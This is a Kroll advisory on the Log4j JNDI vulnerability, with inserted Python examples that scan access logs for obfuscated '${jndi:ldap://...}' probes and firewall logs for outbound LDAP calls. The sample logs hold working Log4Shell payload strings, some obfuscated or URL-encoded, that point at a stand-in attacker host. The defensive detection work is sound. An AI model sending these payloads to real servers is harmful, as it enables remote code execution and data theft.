Fri, Dec 17, 2021
**12/20/2021 Update: Apache has released Log4j 2.17.1, which resolves a Denial of Service and potential Remote Code Execution vulnerability captured in CVE-2021-45105. We recommend organizations update to 2.17.1 as soon as possible, with additional valid recommendations listed below.**
A critical vulnerability has recently been discovered in the Apache Log4j Java logging library (CVE-2021-44228), a library used in many client and server applications. The Log4j library is commonly included in Java-based software, including multiple Apache frameworks such as Struts2, Solr, Druid and Flink. The library provides enhanced logging functionality for Java applications and is widely used.
This vulnerability is the result of an Apache system design error involving the Java Naming and Directory Interface (JNDI). JNDI is part of how applications speak to each other, and in the case of this vulnerability, it has left the application server utilizing the library vulnerable. JNDI handling in log4j (and all applications that use it) was susceptible to a variable injection attack, which can be used to trick the application into leaking sensitive information or executing attacker-provided code. As a result of this vulnerability, threat actors can ultimately exfiltrate sensitive information or execute malicious payloads on vulnerable victim application servers, potentially allowing complete access to your network.
Kroll alerted clients to the threat on Friday, December 10 and shortly thereafter Kroll was engaged by several impacted customers and is continuing to be engaged on new related work as of this article’s posting. Our Kroll Responder team has been continuing to refine telemetry searches to identify potentially impacted instances of log4j in association with external connections to identify applications and hosts that need the most urgent attention.
Our team has observed that scanning an organization’s perimeter networks to identify and prioritize issues requiring immediate focus and time is a crucial initial step. It is also important to review available alerts from any existing security products, most of which have already implemented rules to help identify log4j exposures, and to review and respond to log4j scanning events.
One initial indicator of compromise (IOC) would be specially crafted incoming requests to a victim network. These requests contain special strings in the format “${jndi://[...]}” and may be obfuscated to avoid detection. This could indicate that a network is being scouted by potential threat actors or by their mass-scanning automation to home in on vulnerable applications or networks, and that proactive solutions should be engaged to ensure that a network is not subject to attack and that sensitive data is not being queried and leaving the network.
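The inbound IOC described above can be checked against web server access logs. The following is an added example (not code from the Kroll post): it URL-decodes each line, peels the nested lookup wrappers commonly used to disguise the string, and then looks for the `${jndi:` prefix; the log lines are constructed and use documentation IP ranges.

```python
import re
from urllib.parse import unquote

# Innermost lookup wrappers used to disguise the trigger string. Each one
# evaluates to its argument: "${lower:J}" -> "J", "${upper:n}" -> "n",
# and the default-value form "${::-d}" or "${env:NOPE:-i}" -> "d" / "i".
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
# Negative lookahead keeps a genuine jndi lookup from being collapsed away.
_DEFAULT_WRAPPER = re.compile(r"\$\{(?!jndi)[^{}]*:-([^{}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then peel wrappers from the inside out until stable."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        new = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_jndi_probe(line: str) -> bool:
    """True when the request line carries a JNDI lookup, obfuscated or not."""
    return bool(_JNDI.search(normalize(line)))


def find_probes(lines):
    """Return (line_no, normalized_line) for every request that matches."""
    return [(n, normalize(l)) for n, l in enumerate(lines, 1) if is_jndi_probe(l)]


# Constructed sample access-log lines (not real traffic); the probe string is
# carried in the User-Agent or query string, the fields most often logged.
SAMPLE = [
    '10.0.0.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.23 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}${::-d}${env:X:-i}:ldap://203.0.113.5/b}"',
    '198.51.100.24 - - [10/Dec/2021:14:02:17 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for n, line in find_probes(SAMPLE):
        print(f"line {n}: {line}")
```

Because the wrappers are peeled before matching, a rule written only for the literal text `${jndi:` would miss lines 3 and 4 but this check flags all three probes.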
A more critical indicator of compromise would be detection of any outbound LDAP requests from the network to unknown IPs. This should be immediate cause for concern, as the most likely explanation is that your network has been affected by the Log4j vulnerability.
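The outbound IOC can be checked against firewall or NetFlow records. This added example (not from the Kroll post) flags LDAP/LDAPS connections from internal hosts to any address not on an allowlist of directory servers the organization actually operates; the log lines, the key=value format and the port list are constructed assumptions to be tuned per environment.

```python
import ipaddress
import re

# Ports a JNDI lookup uses to reach a directory server: LDAP, LDAPS and the
# 1389 port frequently seen in Log4Shell callbacks (assumed list; tune it).
LDAP_PORTS = {389, 636, 1389}

# Constructed key=value firewall log lines; not real traffic.
SAMPLE_FW = [
    "ts=2021-12-10T14:02:14Z src=10.20.1.15 dst=10.20.0.5 dport=389 proto=tcp action=allow",
    "ts=2021-12-10T14:02:16Z src=10.20.1.15 dst=203.0.113.5 dport=1389 proto=tcp action=allow",
    "ts=2021-12-10T14:02:18Z src=10.20.1.15 dst=198.51.100.9 dport=443 proto=tcp action=allow",
    "ts=2021-12-10T14:02:20Z src=10.20.1.16 dst=203.0.113.5 dport=636 proto=tcp action=deny",
]

_KV = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Turn one key=value record into a dict."""
    return dict(_KV.findall(line))


def is_suspicious_ldap(rec, known_directory_servers):
    """Outbound LDAP/LDAPS from an internal host to a directory server we do not run.

    A denied attempt is flagged too: the application still tried to resolve
    the lookup, which means it parsed an attacker-controlled string.
    """
    try:
        src = ipaddress.ip_address(rec["src"])
        dst = ipaddress.ip_address(rec["dst"])
        dport = int(rec["dport"])
    except (KeyError, ValueError):
        return False
    if dport not in LDAP_PORTS or not src.is_private:
        return False
    return dst not in known_directory_servers


def flag_outbound_ldap(lines, known_directory_servers):
    """Return the parsed records that warrant immediate investigation."""
    known = {ipaddress.ip_address(a) for a in known_directory_servers}
    return [rec for rec in map(parse, lines) if is_suspicious_ldap(rec, known)]


if __name__ == "__main__":
    for rec in flag_outbound_ldap(SAMPLE_FW, ["10.20.0.5"]):
        print(f"{rec['ts']} {rec['src']} -> {rec['dst']}:{rec['dport']} ({rec['action']})")
```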
At this stage, we’ve instituted detections across a variety of integrations, from endpoints, firewalls and web servers running on Linux, Windows and macOS.
Kroll has observed that this vulnerability is actively being exploited in the wild, and is being used to install botnets and crypto-mining malware and in the initial stages of intrusions. Our investigations are largely identifying that by the time Kroll is engaged, the threat actor has already moved into stage three (3) or four (4) of the Kroll Intrusion Lifecycle, and information is still being gathered and reviewed to determine the separate threat actors and their ultimate goals, whether ransomware, financial fraud or data exfiltration (stages 7 and 8).
Detecting intrusions in the early phases before they move to step 5 or later.
The infosec community has rallied around CVE-2021-44228 due to its wide-ranging impact. Below is a small list of resources compiled by security researchers and agencies worldwide:
Kroll recommends organizations take the following steps:
Even though CISA Director Jen Easterly told industry leaders in a phone briefing Monday that the Log4j vulnerability “is one of the most serious I’ve seen in my entire career, if not the most serious,” and thousands of information security professionals have had very little sleep over the past few days, it’s important to keep a level head. Yes, patch as soon as possible, but also consider existing detections and your ability to respond should something suspicious happen.
For internal teams burdened with a host of other priorities and a remote workforce, support from dedicated experts who have the frontline expertise, resources and technical skills to assess your exposure can greatly reduce your risk profile. Talk to a Kroll expert today via our 24x7 hotlines or contact form.
Contributors to this article: Josh Karanouh-Schuler, Keith Wojcieszek